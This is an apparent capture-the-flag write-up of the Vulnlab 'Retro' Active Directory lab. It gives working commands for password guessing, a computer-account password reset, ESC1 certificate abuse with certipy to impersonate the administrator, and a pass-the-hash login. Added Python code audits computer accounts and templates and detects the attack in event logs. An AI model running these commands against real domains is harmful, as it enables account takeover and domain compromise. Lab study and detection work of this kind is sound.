Vulnlab — Retro

ARZ101
4 min read · Sep 1, 2023

Retro, an easy-rated machine, involved enumerating SMB shares to find an account with a weak password, then finding a note about a pre-created computer account. That account has enrollment rights on a certificate template that allows it to request a certificate on behalf of any other user, which is the ESC1 template attack.

NMAP

PORT      STATE SERVICE    VERSION
53/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0bac716e071c2bcb943273d569612
|_SHA-1: 7f37ea6965982430f9180a65bcadde76add6fea6
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after: 2024-01-24T09:53:42
| MD5: 89ccbcee0485b170bbd1ebee3de93784
|_SHA-1: 2bfca683288bc59e2d2f9ffe01775d871c8c272d
9389/tcp open tcpwrapped
49664/tcp open tcpwrapped
49672/tcp open tcpwrapped
49683/tcp open tcpwrapped
49708/tcp open tcpwrapped

On enumerating SMB with null authentication we can find a few shares

From the Trainees share we get Important.txt, which talks about weak passwords on the trainees' accounts and also mentions bundling all of them into one general trainee account

So we verify whether the account is named trainee with kerbrute

kerbrute userenum --dc 10.10.108.245 -d retro.vl user.txt

We could also have figured this out without guessing, through lookupsid.py from impacket with an anonymous user

lookupsid.py anonymous@10.10.99.152 -no-pass

Since this account has a weak password, we can try common candidates such as the password being the same as the username, trainee, and verify it through crackmapexec

cme smb 10.10.99.152 -u 'trainee' -p 'trainee' --shares

We can now access the Notes share and find a ToDo.txt file which talks about pre-created computer accounts

If we go back to the output of lookupsid, we’ll see a computer account BANKING$

The password for this account is the same as its name; on trying to log in over SMB it shows STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, which means the password was accepted but a workstation trust account is not allowed that type of logon

In order to use this account we need to change its password, which can be done through kpasswd; this requires the realm to be configured in /etc/krb5.conf

kpasswd BANKING$

We can verify again with cme that the password has been changed
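From the defender's side, the BANKING$ finding above is the pre-created computer account pattern: a computer object created in AD with the pre-Windows 2000 option and never joined. The audit below is an added example written for this page, not code from the writeup or from any tool it uses; the computer records are constructed inline to look like LDAP attributes (in practice they would come from an LDAP query for objectClass=computer), and the attribute and flag names are the standard userAccountControl values. The commonly used indicator is a userAccountControl of 0x1020 (WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD) with a zero logonCount; additionally requiring pwdLastSet to still equal whenCreated is an assumption of this example, added so that an account whose password was rotated after creation (as kpasswd does here) is not reported as untouched.

```python
"""Audit computer objects for the pre-created, never-joined pattern.

Example code for this page. Records are constructed to mimic the LDAP
attributes userAccountControl, logonCount, pwdLastSet and whenCreated.
"""
from dataclasses import dataclass
from typing import Iterable, List

# userAccountControl bits (standard values)
WORKSTATION_TRUST_ACCOUNT = 0x1000  # a domain-joined workstation/server account
SERVER_TRUST_ACCOUNT = 0x2000       # a domain controller account
PASSWD_NOTREQD = 0x0020             # set by the "pre-Windows 2000 computer" option


@dataclass
class Computer:
    sam_account_name: str
    user_account_control: int
    logon_count: int
    pwd_last_set: str   # ISO-8601 timestamps as an LDAP exporter would give them
    when_created: str


def is_pre_created(c: Computer) -> bool:
    """True when the object still looks exactly as it did at creation:
    workstation account, password-not-required flag left on, never logged on,
    password never rotated (assumption: rotation == pwdLastSet != whenCreated)."""
    uac = c.user_account_control
    if not uac & WORKSTATION_TRUST_ACCOUNT or uac & SERVER_TRUST_ACCOUNT:
        return False
    if not uac & PASSWD_NOTREQD:
        return False
    never_rotated = c.pwd_last_set == c.when_created
    return c.logon_count == 0 and never_rotated


def audit(computers: Iterable[Computer]) -> List[str]:
    """Names of computer accounts that should be reviewed, joined or deleted."""
    return sorted(c.sam_account_name for c in computers if is_pre_created(c))


# Constructed sample records (not from the target environment).
SAMPLE = [
    # Normal joined workstation: flag cleared, logons, password rotated by the machine.
    Computer("WS01$", 0x1000, 57, "2023-08-14T09:12:00", "2023-03-02T10:00:00"),
    # Pre-created and never joined: the BANKING$ situation from the writeup.
    Computer("BANKING$", 0x1020, 0, "2023-07-23T21:10:05", "2023-07-23T21:10:05"),
    # Flag left on but the machine has joined and rotated its password: not flagged.
    Computer("LEGACY01$", 0x1020, 3, "2023-07-30T08:00:00", "2023-07-23T21:10:05"),
    # Domain controller: different account type, never a candidate.
    Computer("DC$", 0x82000, 1200, "2023-07-01T00:00:00", "2023-01-01T00:00:00"),
]

if __name__ == "__main__":
    for name in audit(SAMPLE):
        print(f"pre-created computer account never joined: {name}")
```

Accounts it reports should either be joined to their intended machine or removed; the PASSWD_NOTREQD bit on its own is worth clearing on any computer object that is already joined.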

Enumerating ADCS with certipy, we see that authenticated users have enrollment rights, but there isn't any template that can be used with the trainee user

However, checking with the BANKING$ account, there’s a template RetroClients on which Domain Computers have enrollment rights, which allows machine accounts to enroll a certificate on behalf of other users, leading to an ESC1 attack

certipy find -u 'BANKING$' -p 'Pass' -dc-ip 10.10.99.152 -stdout -vulnerable

On requesting the administrator’s certificate, it shows an error that the request doesn’t meet the template’s minimum key size; by default certipy sends a 2048-bit key

Specifying a key size of 4096 resolves this issue
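The RetroClients template is vulnerable because of a combination of settings, and the minimum key size is one more attribute worth reporting alongside them. The audit below is an added example written for this page, not certipy's own logic: it applies the ESC1 conditions (enrollee supplies the subject, no manager approval, no authorized signatures, an EKU that permits authentication, enrollment granted to a low-privileged group) to template records constructed inline with the LDAP attribute names a template object carries. A real run would read the objects under CN=Certificate Templates,CN=Public Key Services and resolve the enrollment principals from each template's security descriptor; the "enabled" and "enroll" fields used here stand in for that resolution and are assumptions of the example.

```python
"""Flag certificate templates that meet the ESC1 conditions.

Example code for this page. Template records are constructed with the LDAP
attribute names of a pKICertificateTemplate object; "enroll" (principals with
enrollment rights) and "enabled" (published to a CA) are simplified stand-ins.
"""
from typing import Dict, Iterable, List

# msPKI-Certificate-Name-Flag bit: requester may put any subject/SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request waits for manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let the resulting certificate be used to log on
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}
LOW_PRIV = {"domain users", "domain computers", "authenticated users", "everyone"}


def allows_authentication(ekus: List[str]) -> bool:
    # An empty pKIExtendedKeyUsage means no restriction, i.e. any purpose.
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def esc1_findings(templates: Iterable[Dict]) -> List[Dict]:
    findings = []
    for t in templates:
        if not t["enabled"]:
            continue
        if not t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
            continue
        if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
            continue
        if t["msPKI-RA-Signature"] > 0:
            continue
        if not allows_authentication(t["pKIExtendedKeyUsage"]):
            continue
        enrollers = {p.lower() for p in t["enroll"]} & LOW_PRIV
        if not enrollers:
            continue
        findings.append({
            "template": t["name"],
            "enrollers": sorted(enrollers),
            "min_key_size": t["msPKI-Minimal-Key-Size"],
        })
    return findings


# Constructed sample templates (values chosen for illustration).
SAMPLE_TEMPLATES = [
    {   # the RetroClients situation: enrollee-supplied subject, client auth,
        # Domain Computers may enroll, 4096-bit minimum key
        "name": "RetroClients", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Computers"], "msPKI-Minimal-Key-Size": 4096,
    },
    {   # subject built from AD (UPN required), so not ESC1 even with broad enrollment
        "name": "User", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x02000000, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Users"], "msPKI-Minimal-Key-Size": 2048,
    },
    {   # enrollee supplies subject but an authorized signature is required
        "name": "SignedClients", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 1, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Computers"], "msPKI-Minimal-Key-Size": 2048,
    },
    {   # enrollee supplies subject but the EKU is Server Authentication only
        "name": "WebServer", "enabled": True,
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll": ["Domain Computers"], "msPKI-Minimal-Key-Size": 2048,
    },
]

if __name__ == "__main__":
    for f in esc1_findings(SAMPLE_TEMPLATES):
        print(f"ESC1: {f['template']} enrollable by {f['enrollers']} "
              f"(min key size {f['min_key_size']})")
```

Any template the function reports is fixed by breaking one of the conditions: clear the enrollee-supplies-subject flag, require manager approval or an authorized signature, or restrict enrollment to the specific principals that need it. Reporting the minimum key size also tells an analyst what a successful request against that template will look like in CA logs (here, a 4096-bit key rather than the 2048-bit default).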

certipy req -u 'banking$'@retro.vl -p 'P@ss12345' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096

With this certificate, the administrator’s NT hash can be retrieved

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.99.152

Through evil-winrm we can log in over WinRM using the NT hash of administrator
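The certipy req / certipy auth pair above leaves two correlatable records on the domain controller and CA: a certificate issued to one principal (Event ID 4887, Certificate Services issued a certificate, with its Requester and Serial Number) and a Kerberos TGT obtained with that certificate by a different principal (Event ID 4768, with the certificate serial number filled in when PKINIT was used). The detection below is an added example written for this page, not part of the writeup; the events are constructed inline as dictionaries keyed by the event data field names (Requester, CertificateTemplate, SerialNumber for 4887; TargetUserName, CertSerialNumber for 4768), so a real pipeline would map its exporter's field names onto these.

```python
"""Correlate certificate issuance (4887) with PKINIT logons (4768) and flag
certificates used by a principal other than the one that enrolled for them.

Example code for this page; the event records are constructed.
"""
from typing import Dict, Iterable, List

CERT_ISSUED = 4887     # Certificate Services approved a request and issued a certificate
TGT_REQUESTED = 4768   # A Kerberos authentication ticket (TGT) was requested


def account_name(principal: str) -> str:
    """Normalise 'RETRO\\BANKING$', 'banking$@retro.vl' and 'administrator' to one form."""
    return principal.split("\\")[-1].split("@")[0].lower()


def find_mismatched_pkinit(events: Iterable[Dict]) -> List[Dict]:
    events = list(events)
    issued = {e["SerialNumber"].lower(): e for e in events if e["EventID"] == CERT_ISSUED}
    findings = []
    for e in events:
        if e["EventID"] != TGT_REQUESTED:
            continue
        serial = (e.get("CertSerialNumber") or "").lower()
        if not serial:
            continue  # password-based TGT request: no certificate involved
        cert = issued.get(serial)
        if cert is None:
            continue  # issued by a CA whose 4887 events are not in this feed
        requester = account_name(cert["Requester"])
        user = account_name(e["TargetUserName"])
        if requester != user:
            findings.append({
                "serial": serial,
                "enrolled_by": requester,
                "used_by": user,
                "template": cert["CertificateTemplate"],
                "machine_account": requester.endswith("$"),
            })
    return findings


# Constructed sample events (serial numbers and times are made up).
SAMPLE_EVENTS = [
    # trainee enrolls for a certificate and logs on with it: same principal, benign
    {"EventID": 4887, "Requester": "RETRO\\trainee", "CertificateTemplate": "User",
     "SerialNumber": "1a00000007bc1e6d4e"},
    {"EventID": 4768, "TargetUserName": "trainee", "CertSerialNumber": "1A00000007BC1E6D4E"},
    # a machine account enrolls, then administrator logs on with that certificate
    {"EventID": 4887, "Requester": "RETRO\\BANKING$", "CertificateTemplate": "RetroClients",
     "SerialNumber": "1a00000008d91f4a22"},
    {"EventID": 4768, "TargetUserName": "administrator", "CertSerialNumber": "1a00000008d91f4a22"},
    # ordinary password-based TGT request: ignored
    {"EventID": 4768, "TargetUserName": "trainee", "CertSerialNumber": ""},
]

if __name__ == "__main__":
    for f in find_mismatched_pkinit(SAMPLE_EVENTS):
        print(f"certificate {f['serial']} from template {f['template']} enrolled by "
              f"{f['enrolled_by']} but used to log on as {f['used_by']}")
```

A match where the enrolling principal is a machine account and the logon is a user account, as in the constructed sample, is the ESC1 pattern from this machine and deserves the highest priority; the 4887 event's template name points straight at the setting to fix.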
